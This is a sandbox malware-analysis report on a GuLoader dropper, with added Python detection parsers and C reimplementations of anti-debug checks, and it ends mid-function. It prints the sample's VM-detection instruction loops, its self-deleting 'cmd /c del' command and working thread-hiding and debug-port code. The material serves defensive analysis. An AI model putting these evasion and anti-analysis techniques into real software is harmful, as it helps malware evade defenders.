Source: C:\Users\user\Desktop\POLITICALLY.exe Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\POLITICALLY.exe Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
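The creation lines above give the chain the rest of the report describes: POLITICALLY.exe starts a second copy of itself, explorer.exe (which the sample never launches, so the launch comes from code running inside it, consistent with the injection signatures) starts the 32-bit C:\Windows\SysWOW64\control.exe, and control.exe runs cmd.exe /c del against the original file so the dropper is gone from disk once the payload is resident. The Python below is an added example and not part of the Joe Sandbox report: it rebuilds the tree from "Process created" lines, drops repeated entries, lists self-spawns and flags any "cmd /c del <sample>" whose launching process descends from explorer.exe. The regular expression and the sample lines (the seven creation lines copied from this report, labelled as constructed) are mine; the sample path is passed in as an argument.

```python
"""Rebuild the process tree from a sandbox report's 'Process created' lines
and flag the dropper self-deletion chain. Added example; not part of the
Joe Sandbox report."""
import re

# "Source: <parent> Process created: <child image> <command line>", with the
# report's optional trailing link text tolerated so repeats de-duplicate.
PROC = re.compile(
    r"Source:\s+(?P<parent>\S+)\s+Process created:\s+(?P<image>\S+)\s*"
    r"(?P<cmdline>.*?)(?:\s+Jump to behavior)?\s*$"
)


def parse_process_tree(lines):
    """Ordered, de-duplicated (parent, image, cmdline) edges."""
    edges, seen = [], set()
    for line in lines:
        m = PROC.search(line)
        if not m:
            continue
        edge = (m.group("parent"), m.group("image"), m.group("cmdline"))
        if edge not in seen:
            seen.add(edge)
            edges.append(edge)
    return edges


def self_spawns(edges):
    """Images that start another copy of themselves (hollowing candidates)."""
    return [image for parent, image, _ in edges if parent.lower() == image.lower()]


def lineage(edges, image):
    """Ancestors of image, root first, using the first recorded parent."""
    parent_of = {}
    for parent, child, _ in edges:
        parent_of.setdefault(child, parent)
    chain = [image]
    while True:
        parent = parent_of.get(chain[-1])
        if parent is None or parent == "unknown" or parent in chain:
            break
        chain.append(parent)
    return chain[::-1]


def flag_self_delete(edges, sample_path):
    """Find cmd.exe '/c del <sample_path>' launches and record whether the
    launching process descends from explorer.exe."""
    hits = []
    for parent, image, cmdline in edges:
        if not image.lower().endswith("\\cmd.exe"):
            continue
        if not re.search(r"/c\s+del\s", cmdline, re.IGNORECASE):
            continue
        if sample_path.lower() not in cmdline.lower():
            continue
        chain = lineage(edges, parent) + [image]
        hits.append({
            "chain": chain,
            "via_explorer": any(p.lower().endswith("\\explorer.exe") for p in chain),
        })
    return hits


SAMPLE_LINES = [  # constructed: the process-creation lines of this report
    r"Source: unknown Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'",
    r"Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe",
    r"Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'",
    r"Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe' Jump to behavior",
    r"Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe' Jump to behavior",
]

if __name__ == "__main__":
    tree = parse_process_tree(SAMPLE_LINES)
    print("self-spawns:", self_spawns(tree))
    for hit in flag_self_delete(tree, r"C:\Users\user\Desktop\POLITICALLY.exe"):
        print(" -> ".join(hit["chain"]), "via explorer:", hit["via_explorer"])
```

"cmd /c del" of the sample path is common to many droppers; the discriminating part is the lineage. A system binary started by explorer.exe that immediately deletes a file in the user's profile is worth a rule on its own, independent of the family.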
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp, control.exe, 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp
Source: Binary string: control.pdb source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: POLITICALLY.exe, control.exe
Source: Binary string: control.pdbUGP source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_00416E20 push ebx; iretd 2_2_00416E21
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_00403225 pushfd ; iretd 2_2_00403226
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DC36 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221E245 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221E378 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221E736 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DB19 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02221E17 push ds; iretd 2_2_02221D92
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DFD8 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DD81 push ecx; iretd 2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02221DD8 push ds; iretd 2_2_02221D92
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E28D0D1 push ecx; ret 10_2_1E28D0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0487D0D1 push ecx; ret 23_2_0487D0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BB3B5 push eax; ret 23_2_030BB408
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B8F44 push es; ret 23_2_030B8F45
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BB40B push eax; ret 23_2_030BB472
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BB402 push eax; ret 23_2_030BB408
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BB46C push eax; ret 23_2_030BB472
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030AB48A push edx; ret 23_2_030AB48B
Source: C:\Users\user\Desktop\POLITICALLY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\POLITICALLY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\POLITICALLY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228953 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000016 jmp 00007FDAB4B9AB29h 0x0000001b test ecx, 375658D5h 0x00000021 call 00007FDAB4B9AC71h 0x00000026 call 00007FDAB4B9AA18h 0x0000002b lfence 0x0000002e mov edx, dword ptr [7FFE0014h] 0x00000034 lfence 0x00000037 ret 0x00000038 mov esi, edx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228D11 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FDAB47B2AF8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f jmp 00007FDAB47B2C0Dh 0x00000024 cmp eax, eax 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007FDAB47B29BDh 0x00000039 call 00007FDAB47B2D61h 0x0000003e call 00007FDAB47B2B08h 0x00000043 lfence 0x00000046 mov edx, dword ptr [7FFE0014h] 0x0000004c lfence 0x0000004f ret 0x00000050 mov esi, edx 0x00000052 pushad 0x00000053 rdtsc
Tries to detect Any.run
Source: C:\Users\user\Desktop\POLITICALLY.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\POLITICALLY.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\POLITICALLY.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\POLITICALLY.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp, POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228953 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000016 jmp 00007FDAB4B9AB29h 0x0000001b test ecx, 375658D5h 0x00000021 call 00007FDAB4B9AC71h 0x00000026 call 00007FDAB4B9AA18h 0x0000002b lfence 0x0000002e mov edx, dword ptr [7FFE0014h] 0x00000034 lfence 0x00000037 ret 0x00000038 mov esi, edx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228D11 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FDAB47B2AF8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f jmp 00007FDAB47B2C0Dh 0x00000024 cmp eax, eax 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007FDAB47B29BDh 0x00000039 call 00007FDAB47B2D61h 0x0000003e call 00007FDAB47B2B08h 0x00000043 lfence 0x00000046 mov edx, dword ptr [7FFE0014h] 0x0000004c lfence 0x0000004f ret 0x00000050 mov esi, edx 0x00000052 pushad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228D31 second address: 0000000002228D31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FDAB4B9D341h 0x0000001d popad 0x0000001e call 00007FDAB4B9B24Bh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000000578D31 second address: 0000000000578D31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FDAB47B5431h 0x0000001d popad 0x0000001e call 00007FDAB47B333Bh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000030A85E4 second address: 00000000030A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000030A897E second address: 00000000030A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
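The 02228953/02228D11 windows above, and the identical pair under "Detected RDTSC dummy instruction sequence", are one loop: edi is cleared, [ebp+000000F8h] is loaded with 00A95F60h (11,100,000), and each iteration reads the low dword of KUSER_SHARED_DATA.SystemTime at 7FFE0014h into esi, runs pushad / rdtsc / cpuid (eax=1) / popad so that the rdtsc and cpuid results themselves are thrown away, reads SystemTime again, and adds the difference to edi until the counter reaches zero. Because cpuid traps to the hypervisor under hardware virtualisation, the accumulated SystemTime delta is far larger inside a VM, and SystemTime is driven by the wall clock rather than the TSC, so TSC offsetting by the hypervisor does not hide the cost. The 02228D31 and 00578D31 windows are a different check: cpuid with eax=1 followed by bt ecx, 1Fh tests the hypervisor-present bit (CPUID.1:ECX[31]). The 004085E4/030A85E4 windows are bare back-to-back rdtsc reads. The Python below is an added example, not part of the Joe Sandbox report, and serves both signature groups: it splits each "RDTSC instruction interceptor" line into instructions, classifies the window, and recovers the iteration count when one window initialises a counter slot that another window decrements. The category names, the regular expressions and the sample lines (four interceptor lines copied from this report, labelled as constructed) are mine.

```python
"""Classify the 'RDTSC instruction interceptor' windows of a sandbox report.
Added example; the parsing, the category names and the constructed sample
lines (copied from this report) are not part of the Joe Sandbox output."""
import re

INTERCEPT = re.compile(
    r"RDTSC instruction interceptor: First address: (?P<first>[0-9A-Fa-f]+) "
    r"second address: (?P<second>[0-9A-Fa-f]+) instructions: (?P<body>.*)$"
)
# Every instruction in the dump is preceded by its 0x%08x offset.
OFFSET = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")
# KUSER_SHARED_DATA is mapped at 0x7FFE0000 in every user-mode process;
# offset 0x14 is the low dword of SystemTime (100 ns units).
KUSER_SYSTEMTIME = "7FFE0014h"
COUNTER_INIT = re.compile(r"mov dword ptr \[(?P<slot>[^\]]+)\], (?P<imm>[0-9A-Fa-f]+)h$")
COUNTER_DEC = re.compile(r"dec dword ptr \[(?P<slot>[^\]]+)\]$")


def split_instructions(body):
    """'0x00000000 rdtsc 0x00000002 cpuid' -> ['rdtsc', 'cpuid']"""
    return [p.strip() for p in OFFSET.split(body) if p.strip()]


def classify(instrs):
    """Name the evasion pattern one interceptor window belongs to."""
    has_cpuid = "cpuid" in instrs
    reads_systemtime = any(KUSER_SYSTEMTIME in i for i in instrs)
    if has_cpuid and "bt ecx, 1Fh" in instrs:
        # CPUID.1:ECX[31] is the hypervisor-present bit.
        return "cpuid hypervisor-present bit check"
    if has_cpuid and reads_systemtime:
        # cpuid traps to the hypervisor; the loop sums the SystemTime delta
        # across many iterations (the report's "instruction hammering").
        return "cpuid/SystemTime hammering loop"
    if instrs.count("rdtsc") >= 2:
        return "bare rdtsc delta measurement"
    return "other rdtsc use"


def analyze(lines):
    """Return ([(first, second, category)], {counter slot: iterations})."""
    records = []
    for line in lines:
        m = INTERCEPT.search(line)
        if m:
            records.append((m.group("first"), m.group("second"),
                            split_instructions(m.group("body"))))
    inits, decs = {}, set()
    for _, _, instrs in records:
        for ins in instrs:
            mi = COUNTER_INIT.match(ins)
            if mi:
                inits[mi.group("slot")] = int(mi.group("imm"), 16)
            md = COUNTER_DEC.match(ins)
            if md:
                decs.add(md.group("slot"))
    # A stored immediate only counts as a loop bound if some window also
    # decrements the same slot.
    loops = {slot: n for slot, n in inits.items() if slot in decs}
    return [(f, s, classify(i)) for f, s, i in records], loops


SAMPLE_LINES = [  # constructed: four interceptor lines copied from this report
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228953 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000016 jmp 00007FDAB4B9AB29h 0x0000001b test ecx, 375658D5h 0x00000021 call 00007FDAB4B9AC71h 0x00000026 call 00007FDAB4B9AA18h 0x0000002b lfence 0x0000002e mov edx, dword ptr [7FFE0014h] 0x00000034 lfence 0x00000037 ret 0x00000038 mov esi, edx 0x0000003a pushad 0x0000003b rdtsc",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228D11 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FDAB47B2AF8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f jmp 00007FDAB47B2C0Dh 0x00000024 cmp eax, eax 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007FDAB47B29BDh 0x00000039 call 00007FDAB47B2D61h 0x0000003e call 00007FDAB47B2B08h 0x00000043 lfence 0x00000046 mov edx, dword ptr [7FFE0014h] 0x0000004c lfence 0x0000004f ret 0x00000050 mov esi, edx 0x00000052 pushad 0x00000053 rdtsc",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228D31 second address: 0000000002228D31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FDAB4B9D341h 0x0000001d popad 0x0000001e call 00007FDAB4B9B24Bh 0x00000023 lfence 0x00000026 rdtsc",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc",
]

if __name__ == "__main__":
    records, loops = analyze(SAMPLE_LINES)
    for first, second, category in records:
        print(first, second, category)
    print("loop bounds:", loops)
```

The threshold the sample compares edi against lies outside the captured windows, so the script reports the pattern and the count only, never a verdict about what the sample does next. For defenders the useful part is the shape: a very long cpuid loop timed against KUSER_SHARED_DATA rather than against the TSC.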
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02213269 rdtsc 2_2_02213269
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 00000013.00000000.529987531.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000013.00000000.529944800.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000013.00000002.607237915.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000013.00000000.529944800.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: explorer.exe, 00000013.00000002.607237915.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: POLITICALLY.exe, 0000000A.00000003.497685279.00000000008D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000013.00000000.529285568.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp, POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000013.00000000.529285568.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000013.00000000.529987531.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\POLITICALLY.exe Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\POLITICALLY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\POLITICALLY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\POLITICALLY.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\POLITICALLY.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\POLITICALLY.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\POLITICALLY.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02213269 rdtsc 2_2_02213269
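Three user-mode anti-debug primitives are recorded in this section: NtSetInformationThread with the ThreadHideFromDebugger class (the "HideFromDebugger" lines), NtQueryInformationProcess with ProcessDebugPort (the "DebugPort" lines), and, further down under "Contains functionality to read the PEB", the many "mov eax, dword ptr fs:[00000030h]" reads. The PEB reads need a caveat: fs:[30h] is simply TEB->ProcessEnvironmentBlock in a 32-bit process, and any code that walks the loader's module list touches it, so the read alone is not evidence of anti-debugging; what matters is which PEB fields are dereferenced afterwards (BeingDebugged at +0x02, NtGlobalFlag at +0x68 on x86). The following C is an added example for this report, not code from the sample; it shows the three checks and the PEB field decoding, with the Windows-only calls guarded so the pure decoders build and run anywhere:

```c
/* Added example (not code from the sample): the user-mode anti-debug
 * primitives the report's Anti Debugging section lists, plus decoding of
 * the PEB fields that reads of fs:[30h] usually lead to. Windows-only
 * calls are guarded so the pure decoders compile and run anywhere. */
#include <stdint.h>
#include <stdio.h>

/* NtGlobalFlag heap flags the loader sets when a process is created by a
 * debugger. Caveat: gflags / IFEO can set them too, so this is a hint,
 * not proof of a live debugger. */
#define FLG_HEAP_ENABLE_TAIL_CHECK    0x10u
#define FLG_HEAP_ENABLE_FREE_CHECK    0x20u
#define FLG_HEAP_VALIDATE_PARAMETERS  0x40u
#define NTGF_DEBUGGER_HEAP_FLAGS (FLG_HEAP_ENABLE_TAIL_CHECK | \
                                  FLG_HEAP_ENABLE_FREE_CHECK | \
                                  FLG_HEAP_VALIDATE_PARAMETERS)

int ntglobalflag_indicates_debugger(uint32_t nt_global_flag)
{
    return (nt_global_flag & NTGF_DEBUGGER_HEAP_FLAGS) == NTGF_DEBUGGER_HEAP_FLAGS;
}

/* PEB+0x02 BeingDebugged: the byte IsDebuggerPresent() returns. */
int being_debugged_set(unsigned char peb_being_debugged)
{
    return peb_being_debugged != 0;
}

/* ProcessDebugPort (class 7): zero without a debugger, non-zero (the
 * kernel returns -1) when a user-mode debugger is attached. */
int debug_port_indicates_debugger(uintptr_t debug_port)
{
    return debug_port != 0;
}

#ifdef _WIN32
#include <windows.h>
#include <winternl.h>

/* Not in winternl.h: THREADINFOCLASS value for ThreadHideFromDebugger. */
#define THREAD_HIDE_FROM_DEBUGGER 0x11

typedef NTSTATUS (NTAPI *NtSetInformationThread_t)(HANDLE, ULONG, PVOID, ULONG);
typedef NTSTATUS (NTAPI *NtQueryInformationProcess_t)(HANDLE, PROCESSINFOCLASS,
                                                      PVOID, ULONG, PULONG);

/* The "Thread information set: HideFromDebugger" lines: once set, the
 * debugger no longer receives this thread's exceptions, so a breakpoint
 * in it terminates the process instead of pausing it. */
int hide_current_thread_from_debugger(void)
{
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    NtSetInformationThread_t fn = ntdll
        ? (NtSetInformationThread_t)GetProcAddress(ntdll, "NtSetInformationThread") : NULL;
    if (!fn) return -1;
    return fn(GetCurrentThread(), THREAD_HIDE_FROM_DEBUGGER, NULL, 0) == 0 ? 0 : -1;
}

/* The "Process queried: DebugPort" lines. */
int query_debug_port(uintptr_t *port_out)
{
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    NtQueryInformationProcess_t fn = ntdll
        ? (NtQueryInformationProcess_t)GetProcAddress(ntdll, "NtQueryInformationProcess") : NULL;
    DWORD_PTR port = 0;
    if (!fn) return -1;
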